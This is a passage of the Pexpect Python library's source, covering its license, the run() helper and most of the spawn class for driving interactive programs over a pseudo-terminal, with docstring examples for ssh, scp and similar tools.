There are two main interfaces to the Pexpect system; these are the function,
run() and the class, spawn. The spawn class is more powerful. The run()
function is simpler than spawn, and is good for quickly calling a program. When
you call the run() function it executes a given program and then returns the
output. This is a handy replacement for os.system().
For example::
pexpect.run('ls -la')
The spawn class is the more powerful interface to the Pexpect system. You can
use this to spawn a child program then interact with it by sending input and
expecting responses (waiting for patterns in the child's output).
For example::
child = pexpect.spawn('scp foo [email protected]:.')
child.expect('Password:')
child.sendline(mypassword)
This works even for commands that ask for passwords or other input outside of
the normal stdio streams. For example, ssh reads input directly from the TTY
device which bypasses stdin.
Credits: Noah Spurrier, Richard Holden, Marco Molteni, Kimberley Burchett,
Robert Stone, Hartmut Goebel, Chad Schroeder, Erick Tryzelaar, Dave Kirby, Ids
vander Molen, George Todd, Noel Taylor, Nicolas D. Cesar, Alexander Gattin,
Jacques-Etienne Baudoux, Geoffrey Marshall, Francisco Lourenco, Glen Mabey,
Karthik Gurusamy, Fernando Perez, Corey Minyard, Jon Cohen, Guillaume
Chazarain, Andrew Ryan, Nick Craig-Wood, Andrew Stone, Jorgen Grahn, John
Spiegel, Jan Grant, and Shane Kerr. Let me know if I forgot anyone.
Pexpect is free, open source, and all that good stuff.
http://pexpect.sourceforge.net/
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
try:
import os
import sys
import time
import select
import re
import struct
import resource
import types
import pty
import tty
import termios
import fcntl
import errno
import traceback
import signal
import codecs
except ImportError: # pragma: no cover
err = sys.exc_info()[1]
raise ImportError(str(err) + '''
A critical module was not found. Probably this operating system does not
support it. Pexpect is intended for UNIX-like operating systems.''')
__version__ = '3.1'
__revision__ = ''
__all__ = ['ExceptionPexpect', 'EOF', 'TIMEOUT', 'spawn', 'spawnu', 'run', 'runu',
'which', 'split_command_line', '__version__', '__revision__']
PY3 = (sys.version_info[0] >= 3)
# Exception classes used by this module.
class ExceptionPexpect(Exception):
'''Base class for all exceptions raised by this module.
'''
def __init__(self, value):
super(ExceptionPexpect, self).__init__(value)
self.value = value
def __str__(self):
return str(self.value)
def get_trace(self):
'''This returns an abbreviated stack trace with lines that only concern
the caller. In other words, the stack trace inside the Pexpect module
is not included. '''
tblist = traceback.extract_tb(sys.exc_info()[2])
tblist = [item for item in tblist if 'pexpect/__init__' not in item[0]]
tblist = traceback.format_list(tblist)
return ''.join(tblist)
class EOF(ExceptionPexpect):
'''Raised when EOF is read from a child.
This usually means the child has exited.'''
class TIMEOUT(ExceptionPexpect):
'''Raised when a read time exceeds the timeout. '''
##class TIMEOUT_PATTERN(TIMEOUT):
## '''Raised when the pattern match time exceeds the timeout.
## This is different than a read TIMEOUT because the child process may
## give output, thus never give a TIMEOUT, but the output
## may never match a pattern.
## '''
##class MAXBUFFER(ExceptionPexpect):
## '''Raised when a buffer fills before matching an expected pattern.'''
def run(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None):
'''
This function runs the given command; waits for it to finish; then
returns all output as a string. STDERR is included in output. If the full
path to the command is not given then the path is searched.
Note that lines are terminated by CR/LF (\\r\\n) combination even on
UNIX-like systems because this is the standard for pseudottys. If you set
'withexitstatus' to true, then run will return a tuple of (command_output,
exitstatus). If 'withexitstatus' is false then this returns just
command_output.
The run() function can often be used instead of creating a spawn instance.
For example, the following code uses spawn::
from pexpect import *
child = spawn('scp foo [email protected]:.')
child.expect('(?i)password')
child.sendline(mypassword)
    The previous code can be replaced with the following::
from pexpect import *
run('scp foo [email protected]:.', events={'(?i)password': mypassword})
**Examples**
Start the apache daemon on the local machine::
from pexpect import *
run("/usr/local/apache/bin/apachectl start")
Check in a file using SVN::
from pexpect import *
run("svn ci -m 'automatic commit' my_file.py")
Run a command and capture exit status::
from pexpect import *
(command_output, exitstatus) = run('ls -l /bin', withexitstatus=1)
The following will run SSH and execute 'ls -l' on the remote machine. The
password 'secret' will be sent if the '(?i)password' pattern is ever seen::
run("ssh [email protected] 'ls -l'",
events={'(?i)password':'secret\\n'})
This will start mencoder to rip a video from DVD. This will also display
progress ticks every 5 seconds as it runs. For example::
from pexpect import *
def print_ticks(d):
print d['event_count'],
run("mencoder dvd://1 -o video.avi -oac copy -ovc copy",
events={TIMEOUT:print_ticks}, timeout=5)
The 'events' argument should be a dictionary of patterns and responses.
    Whenever one of the patterns is seen in the command output, run() will send the
associated response string. Note that you should put newlines in your
string if Enter is necessary. The responses may also contain callback
    functions. Any callback is a function that takes a dictionary as an argument.
The dictionary contains all the locals from the run() function, so you can
access the child spawn object or any other variable defined in run()
(event_count, child, and extra_args are the most useful). A callback may
    return True to stop the current run process; otherwise run() continues until
the next event. A callback may also return a string which will be sent to
    the child. 'extra_args' is not used directly by run(). It provides a way to
    pass data to a callback function through run(), via the locals
    dictionary passed to the callback.
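    As a further illustration, a callback can stop run() early by returning
    True. The command and names below are only examples, not part of the API::
        def stop_after_ten(d):
            # d is the locals() of run(); 'event_count' counts handled events.
            return d['event_count'] > 10
        run("ping -c 100 localhost",
            events={TIMEOUT: stop_after_ten}, timeout=5)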
'''
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawn)
def runu(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None, **kwargs):
"""This offers the same interface as :func:`run`, but using unicode.
Like :class:`spawnu`, you can pass ``encoding`` and ``errors`` parameters,
which will be used for both input and output.
"""
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawnu, **kwargs)
def _run(command, timeout, withexitstatus, events, extra_args, logfile, cwd,
env, _spawn, **kwargs):
if timeout == -1:
child = _spawn(command, maxread=2000, logfile=logfile, cwd=cwd, env=env,
**kwargs)
else:
child = _spawn(command, timeout=timeout, maxread=2000, logfile=logfile,
cwd=cwd, env=env, **kwargs)
if events is not None:
patterns = list(events.keys())
responses = list(events.values())
else:
# This assumes EOF or TIMEOUT will eventually cause run to terminate.
patterns = None
responses = None
child_result_list = []
event_count = 0
while True:
try:
index = child.expect(patterns)
if isinstance(child.after, child.allowed_string_types):
child_result_list.append(child.before + child.after)
else:
# child.after may have been a TIMEOUT or EOF,
# which we don't want appended to the list.
child_result_list.append(child.before)
if isinstance(responses[index], child.allowed_string_types):
child.send(responses[index])
elif isinstance(responses[index], types.FunctionType):
callback_result = responses[index](locals())
sys.stdout.flush()
if isinstance(callback_result, child.allowed_string_types):
child.send(callback_result)
elif callback_result:
break
else:
raise TypeError('The callback must be a string or function.')
event_count = event_count + 1
except TIMEOUT:
child_result_list.append(child.before)
break
except EOF:
child_result_list.append(child.before)
break
child_result = child.string_type().join(child_result_list)
if withexitstatus:
child.close()
return (child_result, child.exitstatus)
else:
return child_result
class spawn(object):
'''This is the main class interface for Pexpect. Use this class to start
and control child applications. '''
string_type = bytes
if PY3:
allowed_string_types = (bytes, str)
@staticmethod
def _chr(c):
return bytes([c])
linesep = os.linesep.encode('ascii')
@staticmethod
def write_to_stdout(b):
try:
return sys.stdout.buffer.write(b)
except AttributeError:
# If stdout has been replaced, it may not have .buffer
return sys.stdout.write(b.decode('ascii', 'replace'))
else:
allowed_string_types = (basestring,) # analysis:ignore
_chr = staticmethod(chr)
linesep = os.linesep
write_to_stdout = sys.stdout.write
encoding = None
def __init__(self, command, args=[], timeout=30, maxread=2000,
searchwindowsize=None, logfile=None, cwd=None, env=None,
ignore_sighup=True):
'''This is the constructor. The command parameter may be a string that
includes a command and any arguments to the command. For example::
child = pexpect.spawn('/usr/bin/ftp')
child = pexpect.spawn('/usr/bin/ssh [email protected]')
child = pexpect.spawn('ls -latr /tmp')
You may also construct it with a list of arguments like so::
child = pexpect.spawn('/usr/bin/ftp', [])
child = pexpect.spawn('/usr/bin/ssh', ['[email protected]'])
child = pexpect.spawn('ls', ['-latr', '/tmp'])
After this the child application will be created and will be ready to
talk to. For normal use, see expect() and send() and sendline().
Remember that Pexpect does NOT interpret shell meta characters such as
redirect, pipe, or wild cards (``>``, ``|``, or ``*``). This is a
common mistake. If you want to run a command and pipe it through
another command then you must also start a shell. For example::
child = pexpect.spawn('/bin/bash -c "ls -l | grep LOG > logs.txt"')
child.expect(pexpect.EOF)
The second form of spawn (where you pass a list of arguments) is useful
in situations where you wish to spawn a command and pass it its own
argument list. This can make syntax more clear. For example, the
following is equivalent to the previous example::
shell_cmd = 'ls -l | grep LOG > logs.txt'
child = pexpect.spawn('/bin/bash', ['-c', shell_cmd])
child.expect(pexpect.EOF)
The maxread attribute sets the read buffer size. This is maximum number
of bytes that Pexpect will try to read from a TTY at one time. Setting
the maxread size to 1 will turn off buffering. Setting the maxread
value higher may help performance in cases where large amounts of
output are read back from the child. This feature is useful in
conjunction with searchwindowsize.
        The searchwindowsize attribute sets how far back in the incoming
        search buffer Pexpect will search for pattern matches. Every time
Pexpect reads some data from the child it will append the data to the
incoming buffer. The default is to search from the beginning of the
incoming buffer each time new data is read from the child. But this is
very inefficient if you are running a command that generates a large
amount of data where you want to match. The searchwindowsize does not
affect the size of the incoming data buffer. You will still have
access to the full buffer after expect() returns.
The logfile member turns on or off logging. All input and output will
be copied to the given file object. Set logfile to None to stop
logging. This is the default. Set logfile to sys.stdout to echo
everything to standard output. The logfile is flushed after each write.
Example log input and output to a file::
child = pexpect.spawn('some_command')
fout = file('mylog.txt','w')
child.logfile = fout
Example log to stdout::
child = pexpect.spawn('some_command')
child.logfile = sys.stdout
The logfile_read and logfile_send members can be used to separately log
the input from the child and output sent to the child. Sometimes you
don't want to see everything you write to the child. You only want to
log what the child sends back. For example::
child = pexpect.spawn('some_command')
child.logfile_read = sys.stdout
To separately log output sent to the child use logfile_send::
self.logfile_send = fout
If ``ignore_sighup`` is True, the child process will ignore SIGHUP
signals. For now, the default is True, to preserve the behaviour of
earlier versions of Pexpect, but you should pass this explicitly if you
want to rely on it.
The delaybeforesend helps overcome a weird behavior that many users
were experiencing. The typical problem was that a user would expect() a
"Password:" prompt and then immediately call sendline() to send the
password. The user would then see that their password was echoed back
to them. Passwords don't normally echo. The problem is caused by the
fact that most applications print out the "Password" prompt and then
turn off stdin echo, but if you send your password before the
application turned off echo, then you get your password echoed.
Normally this wouldn't be a problem when interacting with a human at a
real keyboard. If you introduce a slight delay just before writing then
this seems to clear up the problem. This was such a common problem for
many users that I decided that the default pexpect behavior should be
to sleep just before writing to the child application. 1/20th of a
second (50 ms) seems to be enough to clear up the problem. You can set
delaybeforesend to 0 to return to the old behavior. Most Linux machines
don't like this to be below 0.03. I don't know why.
Note that spawn is clever about finding commands on your path.
It uses the same logic that "which" uses to find executables.
If you wish to get the exit status of the child you must call the
close() method. The exit or signal status of the child will be stored
in self.exitstatus or self.signalstatus. If the child exited normally
then exitstatus will store the exit return code and signalstatus will
be None. If the child was terminated abnormally with a signal then
signalstatus will store the signal value and exitstatus will be None.
If you need more detail you can also read the self.status member which
stores the status returned by os.waitpid. You can interpret this using
os.WIFEXITED/os.WEXITSTATUS or os.WIFSIGNALED/os.TERMSIG. '''
self.STDIN_FILENO = pty.STDIN_FILENO
self.STDOUT_FILENO = pty.STDOUT_FILENO
self.STDERR_FILENO = pty.STDERR_FILENO
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.searcher = None
self.ignorecase = False
self.before = None
self.after = None
self.match = None
self.match_index = None
self.terminated = True
self.exitstatus = None
self.signalstatus = None
# status returned by os.waitpid
self.status = None
self.flag_eof = False
self.pid = None
        # the child file descriptor is initially closed
self.child_fd = -1
self.timeout = timeout
self.delimiter = EOF
self.logfile = logfile
# input from child (read_nonblocking)
self.logfile_read = None
# output to send (send, sendline)
self.logfile_send = None
# max bytes to read at one time into buffer
self.maxread = maxread
# This is the read buffer. See maxread.
self.buffer = self.string_type()
# Data before searchwindowsize point is preserved, but not searched.
self.searchwindowsize = searchwindowsize
# Delay used before sending data to child. Time in seconds.
# Most Linux machines don't like this to be below 0.03 (30 ms).
self.delaybeforesend = 0.05
# Used by close() to give kernel time to update process status.
# Time in seconds.
self.delayafterclose = 0.1
# Used by terminate() to give kernel time to update process status.
# Time in seconds.
self.delayafterterminate = 0.1
self.softspace = False
self.name = '<' + repr(self) + '>'
self.closed = True
self.cwd = cwd
self.env = env
self.ignore_sighup = ignore_sighup
        # This flag is set if we are running on Irix
self.__irix_hack = (sys.platform.lower().find('irix') >= 0)
# Solaris uses internal __fork_pty(). All others use pty.fork().
if ((sys.platform.lower().find('solaris') >= 0)
or (sys.platform.lower().find('sunos5') >= 0)):
self.use_native_pty_fork = False
else:
self.use_native_pty_fork = True
# Support subclasses that do not use command or args.
if command is None:
self.command = None
self.args = None
self.name = '<pexpect factory incomplete>'
else:
self._spawn(command, args)
@staticmethod
def _coerce_expect_string(s):
if not isinstance(s, bytes):
return s.encode('ascii')
return s
@staticmethod
def _coerce_send_string(s):
if not isinstance(s, bytes):
return s.encode('utf-8')
return s
@staticmethod
def _coerce_read_string(s):
return s
def __del__(self):
'''This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it. '''
if not self.closed:
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
try:
self.close()
            # which exception, shouldn't we catch explicitly .. ?
except:
pass
def __str__(self):
'''This returns a human-readable string that represents the state of
the object. '''
s = []
s.append(repr(self))
s.append('version: ' + __version__)
s.append('command: ' + str(self.command))
s.append('args: %r' % (self.args,))
s.append('searcher: %r' % (self.searcher,))
s.append('buffer (last 100 chars): %r' % (self.buffer)[-100:],)
s.append('before (last 100 chars): %r' % (self.before)[-100:],)
s.append('after: %r' % (self.after,))
s.append('match: %r' % (self.match,))
s.append('match_index: ' + str(self.match_index))
s.append('exitstatus: ' + str(self.exitstatus))
s.append('flag_eof: ' + str(self.flag_eof))
s.append('pid: ' + str(self.pid))
s.append('child_fd: ' + str(self.child_fd))
s.append('closed: ' + str(self.closed))
s.append('timeout: ' + str(self.timeout))
s.append('delimiter: ' + str(self.delimiter))
s.append('logfile: ' + str(self.logfile))
s.append('logfile_read: ' + str(self.logfile_read))
s.append('logfile_send: ' + str(self.logfile_send))
s.append('maxread: ' + str(self.maxread))
s.append('ignorecase: ' + str(self.ignorecase))
s.append('searchwindowsize: ' + str(self.searchwindowsize))
s.append('delaybeforesend: ' + str(self.delaybeforesend))
s.append('delayafterclose: ' + str(self.delayafterclose))
s.append('delayafterterminate: ' + str(self.delayafterterminate))
return '\n'.join(s)
def _spawn(self, command, args=[]):
'''This starts the given command in a child process. This does all the
fork/exec type of stuff for a pty. This is called by __init__. If args
is empty then command will be parsed (split on spaces) and args will be
set to parsed arguments. '''
# The pid and child_fd of this object get set by this method.
# Note that it is difficult for this method to fail.
# You cannot detect if the child process cannot start.
# So the only way you can tell if the child process started
# or not is to try to read from the file descriptor. If you get
# EOF immediately then it means that the child is already dead.
# That may not necessarily be bad because you may have spawned a child
# that performs some task; creates no stdout output; and then dies.
# If command is an int type then it may represent a file descriptor.
if isinstance(command, type(0)):
raise ExceptionPexpect('Command is an int type. ' +
'If this is a file descriptor then maybe you want to ' +
'use fdpexpect.fdspawn which takes an existing ' +
'file descriptor instead of a command string.')
if not isinstance(args, type([])):
raise TypeError('The argument, args, must be a list.')
if args == []:
self.args = split_command_line(command)
self.command = self.args[0]
else:
# Make a shallow copy of the args list.
self.args = args[:]
self.args.insert(0, command)
self.command = command
command_with_path = which(self.command)
if command_with_path is None:
raise ExceptionPexpect('The command was not found or was not ' +
'executable: %s.' % self.command)
self.command = command_with_path
self.args[0] = self.command
self.name = '<' + ' '.join(self.args) + '>'
assert self.pid is None, 'The pid member must be None.'
assert self.command is not None, 'The command member must not be None.'
if self.use_native_pty_fork:
try:
self.pid, self.child_fd = pty.fork()
except OSError:
err = sys.exc_info()[1]
raise ExceptionPexpect('pty.fork() failed: ' + str(err))
else:
# Use internal __fork_pty
self.pid, self.child_fd = self.__fork_pty()
if self.pid == 0:
# Child
try:
# used by setwinsize()
self.child_fd = sys.stdout.fileno()
self.setwinsize(24, 80)
            # which exception, shouldn't we catch explicitly .. ?
except:
# Some platforms do not like setwinsize (Cygwin).
# This will cause problem when running applications that
# are very picky about window size.
# This is a serious limitation, but not a show stopper.
pass
# Do not allow child to inherit open file descriptors from parent.
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
if self.ignore_sighup:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
if self.cwd is not None:
os.chdir(self.cwd)
if self.env is None:
os.execv(self.command, self.args)
else:
os.execvpe(self.command, self.args, self.env)
# Parent
self.terminated = False
self.closed = False
def __fork_pty(self):
'''This implements a substitute for the forkpty system call. This
should be more portable than the pty.fork() function. Specifically,
this should work on Solaris.
Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
resolve the issue with Python's pty.fork() not supporting Solaris,
particularly ssh. Based on patch to posixmodule.c authored by Noah
Spurrier::
http://mail.python.org/pipermail/python-dev/2003-May/035281.html
'''
parent_fd, child_fd = os.openpty()
if parent_fd < 0 or child_fd < 0:
raise ExceptionPexpect("Could not open with os.openpty().")
pid = os.fork()
if pid < 0:
raise ExceptionPexpect("Failed os.fork().")
elif pid == 0:
# Child.
os.close(parent_fd)
self.__pty_make_controlling_tty(child_fd)
os.dup2(child_fd, 0)
os.dup2(child_fd, 1)
os.dup2(child_fd, 2)
if child_fd > 2:
os.close(child_fd)
else:
# Parent.
os.close(child_fd)
return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
'''This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. '''
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty. Harmless if not already connected.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
        # which exception, shouldn't we catch explicitly .. ?
except:
# Already disconnected. This happens if running inside cron.
pass
os.setsid()
# Verify we are disconnected from controlling tty
# by attempting to open it again.
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY)
if fd >= 0:
os.close(fd)
raise ExceptionPexpect('Failed to disconnect from ' +
'controlling tty. It is still possible to open /dev/tty.')
        # which exception, shouldn't we catch explicitly .. ?
except:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR)
if fd < 0:
raise ExceptionPexpect("Could not open child pty, " + child_name)
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise ExceptionPexpect("Could not open controlling tty, /dev/tty")
else:
os.close(fd)
def fileno(self):
'''This returns the file descriptor of the pty for the child.
'''
return self.child_fd
def close(self, force=True):
'''This closes the connection with the child application. Note that
calling close() more than once is valid. This emulates standard Python
behavior with files. Set force to True if you want to make sure that
the child is terminated (SIGKILL is sent if the child ignores SIGHUP
and SIGINT). '''
if not self.closed:
self.flush()
os.close(self.child_fd)
# Give kernel time to update process status.
time.sleep(self.delayafterclose)
if self.isalive():
if not self.terminate(force):
raise ExceptionPexpect('Could not terminate the child.')
self.child_fd = -1
self.closed = True
#self.pid = None
def flush(self):
'''This does nothing. It is here to support the interface for a
File-like object. '''
pass
def isatty(self):
'''This returns True if the file descriptor is open and connected to a
tty(-like) device, else False. '''
return os.isatty(self.child_fd)
def waitnoecho(self, timeout=-1):
'''This waits until the terminal ECHO flag is set False. This returns
True if the echo mode is off. This returns False if the ECHO flag was
not set False before the timeout. This can be used to detect when the
child is waiting for a password. Usually a child application will turn
off echo mode when it is waiting for the user to enter a password. For
example, instead of expecting the "password:" prompt you can wait for
the child to set ECHO off::
p = pexpect.spawn('ssh [email protected]')
p.waitnoecho()
p.sendline(mypassword)
If timeout==-1 then this method will use the value in self.timeout.
        If timeout==None then this method will block until the ECHO flag is False.
'''
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
while True:
if not self.getecho():
return True
if timeout < 0 and timeout is not None:
return False
if timeout is not None:
timeout = end_time - time.time()
time.sleep(0.1)
def getecho(self):
'''This returns the terminal echo mode. This returns True if echo is
on or False if echo is off. Child applications that are expecting you
to enter a password often set ECHO False. See waitnoecho(). '''
attr = termios.tcgetattr(self.child_fd)
if attr[3] & termios.ECHO:
return True
return False
def setecho(self, state):
'''This sets the terminal echo mode on or off. Note that anything the
child sent before the echo will be lost, so you should be sure that
your input buffer is empty before you call setecho(). For example, the
following will work as expected::
p = pexpect.spawn('cat') # Echo is on by default.
            p.sendline('1234') # We expect to see this twice from the child...
p.expect(['1234']) # ... once from the tty echo...
p.expect(['1234']) # ... and again from cat itself.
p.setecho(False) # Turn off tty echo
            p.sendline('abcd') # We will see this only once (echoed by cat).
            p.sendline('wxyz') # We will see this only once (echoed by cat)
p.expect(['abcd'])
p.expect(['wxyz'])
The following WILL NOT WORK because the lines sent before the setecho
will be lost::
p = pexpect.spawn('cat')
p.sendline('1234')
p.setecho(False) # Turn off tty echo
            p.sendline('abcd') # We will see this only once (echoed by cat).
            p.sendline('wxyz') # We will see this only once (echoed by cat)
p.expect(['1234'])
p.expect(['1234'])
p.expect(['abcd'])
p.expect(['wxyz'])
'''
self.child_fd
attr = termios.tcgetattr(self.child_fd)
if state:
attr[3] = attr[3] | termios.ECHO
else:
attr[3] = attr[3] & ~termios.ECHO
# I tried TCSADRAIN and TCSAFLUSH, but
# these were inconsistent and blocked on some platforms.
# TCSADRAIN would probably be ideal if it worked.
termios.tcsetattr(self.child_fd, termios.TCSANOW, attr)
def _log(self, s, direction):
if self.logfile is not None:
self.logfile.write(s)
self.logfile.flush()
second_log = self.logfile_send if (direction=='send') else self.logfile_read
if second_log is not None:
second_log.write(s)
second_log.flush()
def read_nonblocking(self, size=1, timeout=-1):
'''This reads at most size characters from the child application. It
includes a timeout. If the read does not complete within the timeout
period then a TIMEOUT exception is raised. If the end of file is read
then an EOF exception will be raised. If a log file was set using
setlog() then all data will also be written to the log file.
If timeout is None then the read may block indefinitely.
If timeout is -1 then the self.timeout value is used. If timeout is 0
then the child is polled and if there is no data immediately ready
then this will raise a TIMEOUT exception.
The timeout refers only to the amount of time to read at least one
        character. This is not affected by the 'size' parameter, so if you call
read_nonblocking(size=100, timeout=30) and only one character is
available right away then one character will be returned immediately.
It will not wait for 30 seconds for another 99 characters to come in.
This is a wrapper around os.read(). It uses select.select() to
implement the timeout. '''
if self.closed:
raise ValueError('I/O operation on closed file.')
if timeout == -1:
timeout = self.timeout
# Note that some systems such as Solaris do not give an EOF when
# the child dies. In fact, you can still try to read
# from the child_fd -- it will block forever or until TIMEOUT.
# For this case, I test isalive() before doing any reading.
# If isalive() is false, then I pretend that this is the same as EOF.
if not self.isalive():
# timeout of 0 means "poll"
r, w, e = self.__select([self.child_fd], [], [], 0)
if not r:
self.flag_eof = True
raise EOF('End Of File (EOF). Braindead platform.')
elif self.__irix_hack:
# Irix takes a long time before it realizes a child was terminated.
# FIXME So does this mean Irix systems are forced to always have
# FIXME a 2 second delay when calling read_nonblocking? That sucks.
r, w, e = self.__select([self.child_fd], [], [], 2)
if not r and not self.isalive():
self.flag_eof = True
raise EOF('End Of File (EOF). Slow platform.')
r, w, e = self.__select([self.child_fd], [], [], timeout)
if not r:
if not self.isalive():
# Some platforms, such as Irix, will claim that their
# processes are alive; timeout on the select; and
# then finally admit that they are not alive.
self.flag_eof = True
raise EOF('End of File (EOF). Very slow platform.')
else:
raise TIMEOUT('Timeout exceeded.')
if self.child_fd in r:
try:
s = os.read(self.child_fd, size)
except OSError:
# Linux does this
self.flag_eof = True
raise EOF('End Of File (EOF). Exception style platform.')
if s == b'':
# BSD style
self.flag_eof = True
raise EOF('End Of File (EOF). Empty string style platform.')
s = self._coerce_read_string(s)
self._log(s, 'read')
return s
raise ExceptionPexpect('Reached an unexpected state.')
def read(self, size=-1):
'''This reads at most "size" bytes from the file (less if the read hits
EOF before obtaining size bytes). If the size argument is negative or
omitted, read all data until EOF is reached. The bytes are returned as
a string object. An empty string is returned when EOF is encountered
immediately. '''
if size == 0:
return self.string_type()
if size < 0:
# delimiter default is EOF
self.expect(self.delimiter)
return self.before
# I could have done this more directly by not using expect(), but
# I deliberately decided to couple read() to expect() so that
        # I would catch any bugs early and ensure consistent behavior.
# It's a little less efficient, but there is less for me to
# worry about if I have to later modify read() or expect().
# Note, it's OK if size==-1 in the regex. That just means it
# will never match anything in which case we stop only on EOF.
cre = re.compile(self._coerce_expect_string('.{%d}' % size), re.DOTALL)
# delimiter default is EOF
index = self.expect([cre, self.delimiter])
if index == 0:
### FIXME self.before should be ''. Should I assert this?
return self.after
return self.before
def readline(self, size=-1):
'''This reads and returns one entire line. The newline at the end of
line is returned as part of the string, unless the file ends without a
newline. An empty string is returned if EOF is encountered immediately.
This looks for a newline as a CR/LF pair (\\r\\n) even on UNIX because
this is what the pseudotty device returns. So contrary to what you may
expect you will receive newlines as \\r\\n.
If the size argument is 0 then an empty string is returned. In all
other cases the size argument is ignored, which is not standard
behavior for a file-like object. '''
if size == 0:
return self.string_type()
# delimiter default is EOF
index = self.expect([b'\r\n', self.delimiter])
if index == 0:
return self.before + b'\r\n'
else:
return self.before
def __iter__(self):
'''This is to support iterators over a file-like object.
'''
return iter(self.readline, self.string_type())
def readlines(self, sizehint=-1):
'''This reads until EOF using readline() and returns a list containing
the lines thus read. The optional 'sizehint' argument is ignored.
Remember, because this reads until EOF that means the child
process should have closed its stdout. If you run this method on
a child that is still running with its stdout open then this
        method will block until it times out.'''
lines = []
while True:
line = self.readline()
if not line:
break
lines.append(line)
return lines
def write(self, s):
'''This is similar to send() except that there is no return value.
'''
self.send(s)
def writelines(self, sequence):
'''This calls write() for each element in the sequence. The sequence
can be any iterable object producing strings, typically a list of
strings. This does not add line separators. There is no return value.
'''
for s in sequence:
self.write(s)
def send(self, s):
'''Sends string ``s`` to the child process, returning the number of
bytes written. If a logfile is specified, a copy is written to that
log. '''
time.sleep(self.delaybeforesend)
s = self._coerce_send_string(s)
self._log(s, 'send')
return self._send(s)
def _send(self, s):
return os.write(self.child_fd, s)
def sendline(self, s=''):
'''Wraps send(), sending string ``s`` to child process, with os.linesep
automatically appended. Returns number of bytes written. '''
n = self.send(s)
n = n + self.send(self.linesep)
return n
def sendcontrol(self, char):
        '''Helper method that wraps send() with mnemonic access for sending a control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if a >= 97 and a <= 122:
a = a - ord('a') + 1
return self.send(self._chr(a))
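        # Non-letter control characters map directly to their ASCII control
        # codes below, e.g. Ctrl-] is 29 (group separator) and Ctrl-? is 127 (DEL).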
d = {'@': 0, '`': 0,
'[': 27, '{': 27,
'\\': 28, '|': 28,
']': 29, '}': 29,
'^': 30, '~': 30,
'_': 31,
'?': 127}
if char not in d:
return 0
return self.send(self._chr(d[char]))
def sendeof(self):
'''This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line. '''
### Hmmm... how do I send an EOF?
###C if ((m = write(pty, *buf, p - *buf)) < 0)
###C return (errno == EWOULDBLOCK) ? n : -1;
#fd = sys.stdin.fileno()
#old = termios.tcgetattr(fd) # remember current state
#attr = termios.tcgetattr(fd)
#attr[3] = attr[3] | termios.ICANON # ICANON must be set to see EOF
#try: # use try/finally to ensure state gets restored
# termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# if hasattr(termios, 'CEOF'):
# os.write(self.child_fd, '%c' % termios.CEOF)
# else:
# # Silly platform does not define CEOF so assume CTRL-D
# os.write(self.child_fd, '%c' % 4)
#finally: # restore state
# termios.tcsetattr(fd, termios.TCSADRAIN, old)
if hasattr(termios, 'VEOF'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VEOF])
else:
# platform does not define VEOF so assume CTRL-D
char = 4
self.send(self._chr(char))
def sendintr(self):
'''This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. '''
if hasattr(termios, 'VINTR'):
char = ord(termios.tcgetattr(self.child_fd)[6][termios.VINTR])
else:
# platform does not define VINTR so assume CTRL-C
char = 3
self.send(self._chr(char))
def eof(self):
'''This returns True if the EOF exception was ever raised.
'''
